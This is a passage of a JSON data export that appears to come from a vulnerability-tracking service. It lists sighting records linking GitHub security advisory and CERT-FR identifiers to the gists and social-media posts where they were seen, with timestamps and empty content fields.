"2026-05-13T14:46:52.000000Z"}, {"uuid": "f1a09514-fbb0-44ed-a8f2-58ec5884e01a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vp62-r36r-9xqp", "type": "seen", "source": "https://gist.github.com/yurukusa/9e7ee32aebcba89354718662a4a122b3", "content": "", "creation_timestamp": "2026-05-13T16:13:48.000000Z"}, {"uuid": "541ddc20-a48a-48a5-a522-7a439ed04d16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-429Q-FHH4-R6HJ", "type": "seen", "source": "https://gist.github.com/alon710/81762c48278b036a7f34dc62e8a4137d", "content": "", "creation_timestamp": "2026-05-13T16:10:29.000000Z"}, {"uuid": "b0a0b163-1d30-42de-bbf0-db18385b49e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V25J-WQCW-FVHJ", "type": "seen", "source": "https://gist.github.com/alon710/b27f7301077d94aa9dd0bb4f02951091", "content": "", "creation_timestamp": "2026-05-13T16:40:29.000000Z"}, {"uuid": "1e54f2f7-4d0a-479b-96bc-dc67c1e7e018", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3rxj-6cgf-8cfw", "type": "seen", "source": "https://gist.github.com/alon710/f37dde72118656f1c6b1cac083cc2cb1", "content": "", "creation_timestamp": "2026-05-14T18:10:29.000000Z"}, {"uuid": "cd2df2bb-eb02-40e1-a0d8-8eaac8d6ead3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9M65-766C-R333", "type": "seen", "source": "https://gist.github.com/alon710/f37dde72118656f1c6b1cac083cc2cb1", "content": "", "creation_timestamp": "2026-05-14T18:10:29.000000Z"}, {"uuid": "e066720b-a9f8-4846-8c2d-c84eb55ce666", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7RX4-C5VX-G8W3", "type": "seen", "source": "https://gist.github.com/alon710/260608e1e5e80ae5e3b0acd83fc48ee1", "content": "", "creation_timestamp": "2026-05-14T18:40:28.000000Z"}, {"uuid": "a4ea6b8c-06ec-4afb-95b9-8fa4716b60ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fjxv-7rqg-78g4", "type": "seen", "source": "https://gist.github.com/kernullist/f0dec2675f61579154846c87f0d23334", "content": "", "creation_timestamp": "2026-09-20T17:02:58.798637Z"}, {"uuid": "2b63b84a-af46-4be3-81ff-3190629a0fef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://gist.github.com/konard/52127401a037e0554521d7d74df74811", "content": "", "creation_timestamp": "2026-09-20T16:07:09.356254Z"}, {"uuid": "94c45a2b-84f0-4137-bb2c-03a69a4a9856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-248r-7h7q-cr24", "type": "seen", "source": "https://gist.github.com/alon710/8f8ab6f5732ed98c8d3fdb3bd09a3eb7", "content": "", "creation_timestamp": "2026-05-14T21:40:29.000000Z"}, {"uuid": "0f5885b9-b282-476c-a080-06cc4cf70355", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33p6-5jxp-p3x4", "type": "seen", "source": "https://gist.github.com/alon710/b6fd947590993b5b0ed338c431321ca8", "content": "", "creation_timestamp": "2026-05-14T22:10:29.000000Z"}, {"uuid": "f1acd9f1-67e0-473d-8e9f-ed1d492972dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5v57-8rxj-3p2r", "type": "seen", "source": "https://gist.github.com/alon710/b6fd947590993b5b0ed338c431321ca8", "content": "", "creation_timestamp": "2026-05-14T22:10:29.000000Z"}, {"uuid": "27ea1753-0296-4656-9b0e-0e02601205d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33p6-5jxp-p3x4", "type": "seen", "source": "https://gist.github.com/alon710/f627229667d4bc68a14db2ecccec0ef9", "content": "", "creation_timestamp": "2026-05-14T22:40:29.000000Z"}, {"uuid": "86599bd5-9a1d-488d-81b6-ada0600884eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c4j6-fc7j-m34r", "type": "seen", "source": "https://gist.github.com/hahwul/e82a1e91f75872e43287743d4a15d035", "content": "", "creation_timestamp": "2026-05-15T00:16:17.000000Z"}, {"uuid": "96213dcb-a668-4a0f-bff6-2b44798a3e86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GXHX-2686-5H9G", "type": "seen", "source": "https://gist.github.com/alon710/e4391bc7fc64c5967eebed881d2ad7d3", "content": "", "creation_timestamp": "2026-05-15T07:40:29.000000Z"}, {"uuid": "d83e59b5-5435-43e4-b578-b0133a2fc0ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WF8Q-WVV8-P8JF", "type": "seen", "source": "https://gist.github.com/alon710/db836de6fdadb3f6233ea8cd7bfaf4c5", "content": "", "creation_timestamp": "2026-05-15T08:10:29.000000Z"}, {"uuid": "5cf5b7a1-9ac7-4a63-a530-b12a0637e03b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3CJ-J4F6-WQ85", "type": "seen", "source": "https://gist.github.com/alon710/aa885c0fd60e9933dfca974f0bf10618", "content": "", "creation_timestamp": "2026-05-15T08:40:29.000000Z"}, {"uuid": "b5e08a84-aad8-40c7-ac4a-01fbc71f51ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/tieubao/1732a4285d558ffcc1a1277918bef8b5", "content": "", "creation_timestamp": "2026-05-15T08:36:22.000000Z"}, {"uuid": "6ff16318-9616-4954-ab37-b29fc8b231d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7cv-rxg3-hmpx", "type": "seen", "source": "https://gist.github.com/gabrielstuff/1ec8cb4a351745895c76dfadc789090a", "content": "", "creation_timestamp": "2026-05-15T08:34:35.000000Z"}, {"uuid": "9ece1d3f-79ea-4d93-9ffd-1745159cf44e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jgg6-4rpr-wfh7", "type": "seen", "source": "https://gist.github.com/gabrielstuff/1ec8cb4a351745895c76dfadc789090a", "content": "", "creation_timestamp": "2026-05-15T08:34:35.000000Z"}, {"uuid": "53e02a47-ece0-4a10-809a-b9e6183bf02d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wx9m-wx4f-4cmg", "type": "seen", "source": "https://gist.github.com/gabrielstuff/1ec8cb4a351745895c76dfadc789090a", "content": "", "creation_timestamp": "2026-05-15T08:34:35.000000Z"}, {"uuid": "a1ff719a-38ad-49ce-b35e-5f028e9ac3ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/vvthien/c72781640076da6386757da03abc5c42", "content": "", "creation_timestamp": "2026-05-15T10:56:23.000000Z"}, {"uuid": "7672b989-5546-414b-a8bb-616d8b24eea7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vp62-r36r-9xqp", "type": "seen", "source": "https://gist.github.com/yurukusa/24d898a84957a775dac955cfcec7cca3", "content": "", "creation_timestamp": "2026-05-15T12:01:58.000000Z"}, {"uuid": "05df88f7-87fb-407c-b096-db17513c3dd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MXG3-432P-MR72", "type": "seen", "source": "https://gist.github.com/alon710/1474aba13ecdd80a0e1ac1b868112ef1", "content": "", "creation_timestamp": "2026-05-15T17:40:36.000000Z"}, {"uuid": "bc45c3eb-f418-4f7b-bc54-65c404918251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mq5j-pw29-jcv3", "type": "seen", "source": "https://gist.github.com/alon710/603dfdf0e01af88d7ae6413c9f3332fe", "content": "", "creation_timestamp": "2026-05-15T18:40:29.000000Z"}, {"uuid": "d228e94e-df93-4487-8da5-b6997baa9856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QXVM-R42F-5P8J", "type": "seen", "source": "https://gist.github.com/alon710/3f6e131558b54840867035277f5b43a2", "content": "", "creation_timestamp": "2026-05-15T19:40:30.000000Z"}, {"uuid": "50056fe8-3585-4234-baf5-de3fedd3ede8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m55x-h47x-v3gx", "type": "seen", "source": "https://gist.github.com/ichintu/d777ea5b68bd57d9ca8afc2774b06bad", "content": "", "creation_timestamp": "2026-05-15T20:01:09.000000Z"}, {"uuid": "07b5ee1d-89e9-4b6e-a05b-a0604dc65553", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RC6V-5RMX-W5MV", "type": "seen", "source": "https://gist.github.com/alon710/7369a43661d2464459ab6b6fcb329366", "content": "", "creation_timestamp": "2026-05-15T20:40:29.000000Z"}, {"uuid": "995de611-d1ad-4cc5-904f-3546cd9104a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VFVV-C25P-M7MM", "type": "seen", "source": "https://gist.github.com/alon710/eb93d50b17daa578bcc910ffc0480f36", "content": "", "creation_timestamp": "2026-05-15T21:10:29.000000Z"}, {"uuid": "a8c163a8-ba38-408b-b235-217de274d94e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WXW3-Q3M9-C3JR", "type": "seen", "source": "https://gist.github.com/alon710/4cc7bcd5f1c1a36dc5ed49cf14f62cbd", "content": "", "creation_timestamp": "2026-05-15T21:40:29.000000Z"}, {"uuid": "bbb92779-62b7-41f4-8e47-2b3a327dd371", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vp62-r36r-9xqp", "type": "seen", "source": "https://gist.github.com/yurukusa/5c8b3e8b91565277380e74348cd7783b", "content": "", "creation_timestamp": "2026-05-16T01:17:34.000000Z"}, {"uuid": "05da3d34-46e1-41d6-a67e-10393b9ac59a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xgp8-3hg3-c2mh", "type": "seen", "source": "https://gist.github.com/AlgoDev-hash/09b8d3924b1510f4f9fb853b347af34a", "content": "", "creation_timestamp": "2026-05-16T02:04:03.000000Z"}, {"uuid": "b2911234-e744-4b1f-b47f-0a2d8da48d4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-965h-392x-2mh5", "type": "seen", "source": "https://gist.github.com/AlgoDev-hash/09b8d3924b1510f4f9fb853b347af34a", "content": "", "creation_timestamp": "2026-05-16T02:04:03.000000Z"}, {"uuid": "5dc5c7a2-839b-461c-b86e-803591d73254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G7CV-RXG3-HMPX", "type": "seen", "source": "https://t.me/GithubRedTeam/84445", "content": "", "creation_timestamp": "2026-05-16T12:00:04.000000Z"}, {"uuid": "1d7c7b14-7e99-4177-9194-55af90ce54ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c4j6-fc7j-m34r", "type": "seen", "source": "https://gist.github.com/leedc0101/2125a81a4a6c9a3e8ceb67fea7454149", "content": "", "creation_timestamp": "2026-05-17T01:29:38.000000Z"}, {"uuid": "857acf2e-7237-4bdc-a162-0fd2838b721a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q7rr-3cgh-j5r3", "type": "seen", "source": "https://gist.github.com/okilicarslan/c1a124840cde2bb66278de96a61a2a72", "content": "", "creation_timestamp": "2026-05-17T09:27:14.000000Z"}, {"uuid": "cfd2dc7d-bbcb-4360-a91c-640cc6d99179", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v5r2-qh84-fjx5", "type": "seen", "source": "https://gist.github.com/nicolargo/c90ae7e9f35657ec0b51575e2c68667c", "content": "", "creation_timestamp": "2026-05-17T10:05:05.000000Z"}, {"uuid": "eaf6cd5c-b7cd-45f3-aed0-987a17ed6962", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-965h-392x-2mh5", "type": "seen", "source": "https://gist.github.com/web3securityauditor/7d7d8acf63a2ec18ed25f500c878c123", "content": "", "creation_timestamp": "2026-05-17T18:09:49.000000Z"}, {"uuid": "da421f9d-e5a6-4de1-862f-ac254285d805", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xgp8-3hg3-c2mh", "type": "seen", "source": "https://gist.github.com/web3securityauditor/7d7d8acf63a2ec18ed25f500c878c123", "content": "", "creation_timestamp": "2026-05-17T18:09:49.000000Z"}, {"uuid": "2b54af85-7a4f-46d1-beb0-9ecfe71450e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-82j2-j2ch-gfr8", "type": "seen", "source": "https://gist.github.com/web3securityauditor/7d7d8acf63a2ec18ed25f500c878c123", "content": "", "creation_timestamp": "2026-05-17T18:09:49.000000Z"}, {"uuid": "0faa739f-5b69-493e-bed5-a281c104bd08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pwjx-qhcg-rvj4", "type": "seen", "source": "https://gist.github.com/web3securityauditor/7d7d8acf63a2ec18ed25f500c878c123", "content": "", "creation_timestamp": "2026-05-17T18:09:49.000000Z"}, {"uuid": "77175a0b-ae11-4d0e-b54f-533cd89af427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgwx-8r98-p34c", "type": "seen", "source": "https://gist.github.com/web3securityauditor/d2e4cde8ac7f8d357246d720abdd202b", "content": "", "creation_timestamp": "2026-05-17T22:15:11.000000Z"}, {"uuid": "13355ca2-6ec8-4ec5-8dae-2e11131923e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qgp8-v765-qxx9", "type": "seen", "source": "https://gist.github.com/MarisollieNULL/935455fadca48e7a3343eb0015eb0b69", "content": "", "creation_timestamp": "2026-05-17T23:06:40.000000Z"}, {"uuid": "e605169d-b38d-4751-be2c-ee83419bec4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mq59-m269-xvcx", "type": "seen", "source": "https://gist.github.com/MarisollieNULL/a118747c6ccbbc3d057b25e0b11923bd", "content": "", "creation_timestamp": "2026-05-18T00:07:08.000000Z"}, {"uuid": "d9869573-b00e-40a3-a407-5fef02fdabec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://gist.github.com/MarisollieNULL/a118747c6ccbbc3d057b25e0b11923bd", "content": "", "creation_timestamp": "2026-05-18T00:07:08.000000Z"}, {"uuid": "f75b1364-2782-4321-920c-016fe82afae0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jcc7-9wpm-mj36", "type": "seen", "source": "https://gist.github.com/MarisollieNULL/a118747c6ccbbc3d057b25e0b11923bd", "content": "", "creation_timestamp": "2026-05-18T00:07:08.000000Z"}, {"uuid": "67005ec1-b565-41d1-bb4c-f04c4102e011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vp62-r36r-9xqp", "type": "seen", "source": "https://gist.github.com/yurukusa/a5b2a32ca57e75eb1e96adcf67bcf2c3", "content": "", "creation_timestamp": "2026-05-18T09:19:47.000000Z"}, {"uuid": "bbf65c7e-3e05-433c-bc0e-339f5685bd2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-022", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116595382450086436", "content": "", "creation_timestamp": "2026-05-18T11:39:09.916843Z"}, {"uuid": "6c12d46b-c020-48f4-b2d5-b1445c9e09d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-022", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mm4s3dwvnz2n", "content": "", "creation_timestamp": "2026-05-18T11:39:08.003946Z"}, {"uuid": "0114c26b-b1cf-4f35-9603-0720f58b5ea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jcc7-9wpm-mj36", "type": "seen", "source": "https://gist.github.com/MarisollieNULL/91df2a5b8be5f9f07e9a52a1b572afe4", "content": "", "creation_timestamp": "2026-05-18T11:49:53.000000Z"}, {"uuid": "742fd904-c5e7-40cf-938d-116d34594a89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mq59-m269-xvcx", "type": "seen", "source": "https://gist.github.com/MarisollieNULL/91df2a5b8be5f9f07e9a52a1b572afe4", "content": "", "creation_timestamp": "2026-05-18T11:49:53.000000Z"}, {"uuid": "02a095ed-c2de-45ad-b1c7-44e89e8af3a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://gist.github.com/MarisollieNULL/91df2a5b8be5f9f07e9a52a1b572afe4", "content": "", "creation_timestamp": "2026-05-18T11:49:53.000000Z"}, {"uuid": "d8d2c387-0008-4f4f-85c4-5bcf6fc49b5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-97R8-RF7Q-WMJW", "type": "seen", "source": "https://gist.github.com/alon710/98fbc08fd28e864acb5a0c94e605d960", "content": "", "creation_timestamp": "2026-05-18T14:10:50.000000Z"}, {"uuid": "c31e0fe7-4a0d-4934-a708-57ca330cfa8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-79cf-xcqc-c78w", "type": "seen", "source": "https://gist.github.com/alon710/6c307c7259353f2c5a97793055cbda6e", "content": "", "creation_timestamp": "2026-05-18T14:40:50.000000Z"}, {"uuid": "7cdbbae7-8d98-4e04-af5e-161cb3f19374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5R97-79VW-QVM4", "type": "seen", "source": "https://gist.github.com/alon710/437f2e5c2f0622a4f1f7e66c52bc342f", "content": "", "creation_timestamp": "2026-05-18T16:10:50.000000Z"}, {"uuid": "d0d76828-b014-4358-a8f5-3bf9c905d732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C55G-RP4X-FX84", "type": "seen", "source": "https://gist.github.com/alon710/f7ea0e610f42bb6c81fff1ec9bb3b2bd", "content": "", "creation_timestamp": "2026-05-18T16:40:50.000000Z"}, {"uuid": "eb9c7e1c-f32b-4efc-bf2d-5b83ceaca4f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FVH2-GM75-J4J7", "type": "seen", "source": "https://gist.github.com/alon710/1478335359dc82e8637524c3acdbcdae", "content": "", "creation_timestamp": "2026-05-18T17:40:50.000000Z"}, {"uuid": "20f593d0-ecdf-4b36-88f4-513c7d935311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JGG6-4RPR-WFH7", "type": "seen", "source": "https://gist.github.com/alon710/2086198312b306686e313c1e5c4a662e", "content": "", "creation_timestamp": "2026-05-18T19:10:51.000000Z"}, {"uuid": "a5cb111e-2d5f-44c6-8a29-6ab730248cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7cv-rxg3-hmpx", "type": "seen", "source": "https://gist.github.com/Fazzani/7a76d5ae430e05c763c6a86cbca9d42f", "content": "", "creation_timestamp": "2026-05-18T20:22:18.000000Z"}, {"uuid": "6aa4f477-d8a4-4eb5-bdbe-1f9a5f724726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://gist.github.com/konard/4ad360f50626a30518f6308cbbc7cf43", "content": "", "creation_timestamp": "2026-09-20T15:56:48.230705Z"}, {"uuid": "4be3f1be-b870-4f9e-af26-1f1fe82b3381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-866g-f22w-33x8", "type": "seen", "source": "https://gist.github.com/konard/4ad360f50626a30518f6308cbbc7cf43", "content": "", "creation_timestamp": "2026-09-20T15:56:46.318491Z"}, {"uuid": "9c3f15bd-6263-417b-8e7c-bb773c9b83ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p498-v437-472g", "type": "seen", "source": "https://gist.github.com/konard/4ad360f50626a30518f6308cbbc7cf43", "content": "", "creation_timestamp": "2026-09-20T15:56:44.360561Z"}, {"uuid": "358c032a-79d5-446f-aeee-9ad27bbaedb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5v7r-6r5c-r473", "type": "seen", "source": "https://gist.github.com/konard/4ad360f50626a30518f6308cbbc7cf43", "content": "", "creation_timestamp": "2026-09-20T15:56:42.554601Z"}, {"uuid": "4af3597b-cb85-4fd7-a421-30a0ff6abeae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4x5r-pxfx-6jf8", "type": "seen", "source": "https://gist.github.com/konard/4ad360f50626a30518f6308cbbc7cf43", "content": "", "creation_timestamp": "2026-09-20T15:56:40.431669Z"}, {"uuid": "656955cd-9bb9-4b67-a0f2-1a1ee7b02486", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-87xg-pxx2-7hvx", "type": "seen", "source": "https://bsky.app/profile/cure53.infosec.exchange.ap.brid.gy/post/3mm73btqiso62", "content": "", "creation_timestamp": "2026-05-19T09:29:12.274584Z"}, {"uuid": "087e561a-7e3b-49f9-bf2c-2352c5a027ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FHVH-VW7H-9XF3", "type": "seen", "source": "https://gist.github.com/alon710/c234ec86be1c4c5715ed61d6d656e517", "content": "", "creation_timestamp": "2026-05-19T17:10:50.000000Z"}, {"uuid": "59ffdea7-ef5b-47c2-ad5e-198c94116525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jggg-4jg4-v7c6", "type": "seen", "source": "https://gist.github.com/alon710/4e72f2de4fd57f71c04d127b90b84200", "content": "", "creation_timestamp": "2026-05-19T16:40:49.000000Z"}, {"uuid": "39ff06dc-33d4-4d17-86f9-d4e1ee5fdfba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HC3C-63HC-2R9F", "type": "seen", "source": "https://gist.github.com/alon710/c4a860134b6110f10b39bc6e4ccfdea2", "content": "", "creation_timestamp": "2026-05-19T18:10:50.000000Z"}, {"uuid": "4266579d-ed89-480d-ba78-2c2bc003b707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/beb604d0f86e740a59c10cc19fb9b50b", "content": "", "creation_timestamp": "2026-05-19T19:44:33.000000Z"}, {"uuid": "388c1e39-11c0-4485-bf2c-ca21757e6cc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/beb604d0f86e740a59c10cc19fb9b50b", "content": "", "creation_timestamp": "2026-05-19T19:44:33.000000Z"}, {"uuid": 